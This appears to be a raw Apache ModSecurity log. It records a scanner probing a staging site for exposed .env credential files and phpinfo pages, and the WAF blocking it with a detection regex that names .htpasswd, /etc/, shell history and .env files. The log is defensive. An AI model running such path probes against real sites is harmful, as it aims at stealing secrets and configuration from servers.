[Tue May 26 15:31:05.913770 2026] [security2:error] [pid 715645:tid 715880] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvYXVGgMGh8k213RgVQQAAAGk"]
[Tue May 26 15:31:06.134517 2026] [security2:error] [pid 715645:tid 715806] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvYnVGgMGh8k213RgVVgAAAB8"]
[Tue May 26 15:31:06.156912 2026] [security2:error] [pid 715645:tid 715856] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvYnVGgMGh8k213RgVWQAAAFE"]
[Tue May 26 15:31:06.210505 2026] [security2:error] [pid 715645:tid 715898] [client 181.177.103.141:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVvYnVGgMGh8k213RgVXAAAAHs"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1451658&moderation-hash=e1d6a6b8e4284daf45d45ed63eb70ee7
[Tue May 26 15:31:06.267174 2026] [security2:error] [pid 715645:tid 715827] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvYnVGgMGh8k213RgVYgAAADQ"]
[Tue May 26 15:31:06.332967 2026] [security2:error] [pid 715645:tid 715810] [client 195.178.110.199:55968] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/new/.env"] [unique_id "ahVvYnVGgMGh8k213RgVdQAAACM"]
[Tue May 26 15:31:06.341753 2026] [security2:error] [pid 715645:tid 715861] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvYnVGgMGh8k213RgVawAAAFY"]
[Tue May 26 15:31:06.358645 2026] [security2:error] [pid 715645:tid 715789] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvYnVGgMGh8k213RgVcQAAAA4"]
[Tue May 26 15:31:06.360085 2026] [security2:error] [pid 715645:tid 715883] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvYnVGgMGh8k213RgVcAAAAGw"]
[Tue May 26 15:31:06.371449 2026] [security2:error] [pid 715645:tid 715842] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvYnVGgMGh8k213RgVdAAAAEM"]
[Tue May 26 15:31:06.379723 2026] [security2:error] [pid 715645:tid 715837] [client 195.178.110.199:41744] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/node/api/.env"] [unique_id "ahVvYnVGgMGh8k213RgVeQAAAD4"]
[Tue May 26 15:31:06.396597 2026] [security2:error] [pid 715645:tid 715885] [client 195.178.110.199:41818] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/nodeapi/.env"] [unique_id "ahVvYnVGgMGh8k213RgVegAAAG4"]
[Tue May 26 15:31:06.410987 2026] [security2:error] [pid 715645:tid 715821] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvYnVGgMGh8k213RgVeAAAAC4"]
[Tue May 26 15:31:06.443546 2026] [security2:error] [pid 715645:tid 715841] [client 195.178.110.199:41746] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/nodeweb/.env"] [unique_id "ahVvYnVGgMGh8k213RgVewAAAEI"]
[Tue May 26 15:31:06.455525 2026] [security2:error] [pid 715645:tid 715845] [client 195.178.110.199:41706] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/opt/.env"] [unique_id "ahVvYnVGgMGh8k213RgVfAAAAEY"]
[Tue May 26 15:31:06.560788 2026] [security2:error] [pid 715645:tid 715794] [client 195.178.110.199:41660] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/market/.env"] [unique_id "ahVvYnVGgMGh8k213RgViQAAABM"]
[Tue May 26 15:31:06.567539 2026] [security2:error] [pid 715645:tid 715893] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvYnVGgMGh8k213RgVggAAAHY"]
[Tue May 26 15:31:06.583194 2026] [security2:error] [pid 715645:tid 715888] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvYnVGgMGh8k213RgVhQAAAHE"]
[Tue May 26 15:31:06.593401 2026] [security2:error] [pid 715645:tid 715800] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvYnVGgMGh8k213RgViAAAABk"]
[Tue May 26 15:31:06.652371 2026] [security2:error] [pid 715645:tid 715890] [client 195.178.110.199:41746] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/marketing/.env"] [unique_id "ahVvYnVGgMGh8k213RgVjQAAAHM"]
[Tue May 26 15:31:06.705033 2026] [security2:error] [pid 715645:tid 715889] [client 195.178.110.199:41636] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/media/.env"] [unique_id "ahVvYnVGgMGh8k213RgVjgAAAHI"]
[Tue May 26 15:31:06.755738 2026] [security2:error] [pid 715645:tid 715873] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvYnVGgMGh8k213RgVkQAAAGI"]
[Tue May 26 15:31:06.814345 2026] [security2:error] [pid 715645:tid 715822] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvYnVGgMGh8k213RgVlAAAAC8"]
[Tue May 26 15:31:06.849738 2026] [security2:error] [pid 715645:tid 715875] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvYnVGgMGh8k213RgVmAAAAGQ"]
[Tue May 26 15:31:06.855560 2026] [security2:error] [pid 715645:tid 715817] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvYnVGgMGh8k213RgVmgAAACo"]
[Tue May 26 15:31:06.908169 2026] [security2:error] [pid 715645:tid 715819] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvYnVGgMGh8k213RgVnwAAACw"]
[Tue May 26 15:31:06.910271 2026] [security2:error] [pid 715645:tid 715902] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvYnVGgMGh8k213RgVoAAAAH8"]
[Tue May 26 15:31:06.945850 2026] [security2:error] [pid 715645:tid 715899] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvYnVGgMGh8k213RgVpgAAAHw"]
[Tue May 26 15:31:06.979829 2026] [security2:error] [pid 715645:tid 715848] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvYnVGgMGh8k213RgVqQAAAEk"]
[Tue May 26 15:31:06.996905 2026] [security2:error] [pid 715645:tid 715810] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvYnVGgMGh8k213RgVrAAAACM"]
[Tue May 26 15:31:07.012499 2026] [security2:error] [pid 715645:tid 715808] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvYnVGgMGh8k213RgVsgAAACE"]
[Tue May 26 15:31:07.102867 2026] [security2:error] [pid 715645:tid 715837] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvY3VGgMGh8k213RgVuwAAAD4"]
[Tue May 26 15:31:07.124379 2026] [security2:error] [pid 715645:tid 715814] [client 195.178.110.199:55942] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/old/.env"] [unique_id "ahVvY3VGgMGh8k213RgVvAAAACc"]
[Tue May 26 15:31:07.161786 2026] [security2:error] [pid 715645:tid 715791] [client 195.178.110.199:41706] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/php_info.php"] [unique_id "ahVvY3VGgMGh8k213RgVvQAAABA"]
[Tue May 26 15:31:07.241077 2026] [security2:error] [pid 715645:tid 715794] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvY3VGgMGh8k213RgVwQAAABM"]
[Tue May 26 15:31:07.263274 2026] [security2:error] [pid 715645:tid 715801] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvY3VGgMGh8k213RgVxQAAABo"]
[Tue May 26 15:31:07.439725 2026] [security2:error] [pid 715645:tid 715778] [client 195.178.110.199:41660] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/php-info.php"] [unique_id "ahVvY3VGgMGh8k213RgVzQAAAAM"]
[Tue May 26 15:31:07.448603 2026] [security2:error] [pid 715645:tid 715825] [client 195.178.110.199:41746] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/php.php"] [unique_id "ahVvY3VGgMGh8k213RgVzgAAADI"]
[Tue May 26 15:31:07.469733 2026] [security2:error] [pid 715645:tid 715860] [client 195.178.110.199:41636] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvY3VGgMGh8k213RgVyQAAAFU"]
[Tue May 26 15:31:07.481773 2026] [security2:error] [pid 715645:tid 715873] [client 195.178.110.199:55968] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/product/.env"] [unique_id "ahVvY3VGgMGh8k213RgV0AAAAGI"]
[Tue May 26 15:31:07.482499 2026] [security2:error] [pid 715645:tid 715829] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvY3VGgMGh8k213RgVzAAAADY"]
[Tue May 26 15:31:07.494300 2026] [security2:error] [pid 715645:tid 715886] [client 195.178.110.199:41744] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/production/.env"] [unique_id "ahVvY3VGgMGh8k213RgV1AAAAG8"]
[Tue May 26 15:31:07.500004 2026] [security2:error] [pid 715645:tid 715857] [client 195.178.110.199:41834] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/phpinfo.php"] [unique_id "ahVvY3VGgMGh8k213RgV1QAAAFI"]
[Tue May 26 15:31:07.537814 2026] [security2:error] [pid 715645:tid 715871] [client 195.178.110.199:41726] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/portal/.env"] [unique_id "ahVvY3VGgMGh8k213RgV1wAAAGA"]
[Tue May 26 15:31:07.567380 2026] [security2:error] [pid 715645:tid 715776] [client 195.178.110.199:55934] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/prod/.env"] [unique_id "ahVvY3VGgMGh8k213RgV3gAAAAE"]
[Tue May 26 15:31:07.574101 2026] [security2:error] [pid 715645:tid 715802] [client 195.178.110.199:41810] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvY3VGgMGh8k213RgV1gAAABs"]
[Tue May 26 15:31:07.589206 2026] [security2:error] [pid 715645:tid 715900] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvY3VGgMGh8k213RgV2gAAAH0"]
[Tue May 26 15:31:07.591248 2026] [security2:error] [pid 715645:tid 715855] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvY3VGgMGh8k213RgV3QAAAFA"]
[Tue May 26 15:31:07.656864 2026] [security2:error] [pid 715645:tid 715843] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvY3VGgMGh8k213RgV5gAAAEQ"]
[Tue May 26 15:31:07.673279 2026] [security2:error] [pid 715645:tid 715782] [client 195.178.110.199:41680] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvY3VGgMGh8k213RgV7QAAAAc"]
[Tue May 26 15:31:07.697271 2026] [security2:error] [pid 715645:tid 715830] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvY3VGgMGh8k213RgV8AAAADc"]
[Tue May 26 15:31:07.716412 2026] [security2:error] [pid 715645:tid 715844] [client 195.178.110.199:55934] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/public/phpinfo.php"] [unique_id "ahVvY3VGgMGh8k213RgV9QAAAEU"]
[Tue May 26 15:31:07.724231 2026] [security2:error] [pid 715645:tid 715842] [client 195.178.110.199:41810] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/project/.env"] [unique_id "ahVvY3VGgMGh8k213RgV9gAAAEM"]
[Tue May 26 15:31:07.746528 2026] [security2:error] [pid 715645:tid 715811] [client 195.178.110.199:56030] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/public-api/.env"] [unique_id "ahVvY3VGgMGh8k213RgV-wAAACQ"]
[Tue May 26 15:31:07.756873 2026] [security2:error] [pid 715645:tid 715790] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvY3VGgMGh8k213RgV9AAAAA8"]
[Tue May 26 15:31:07.771439 2026] [security2:error] [pid 715645:tid 715874] [client 195.178.110.199:41636] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvY3VGgMGh8k213RgV9wAAAGM"]
[Tue May 26 15:31:07.785447 2026] [security2:error] [pid 715645:tid 715821] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvY3VGgMGh8k213RgV-gAAAC4"]
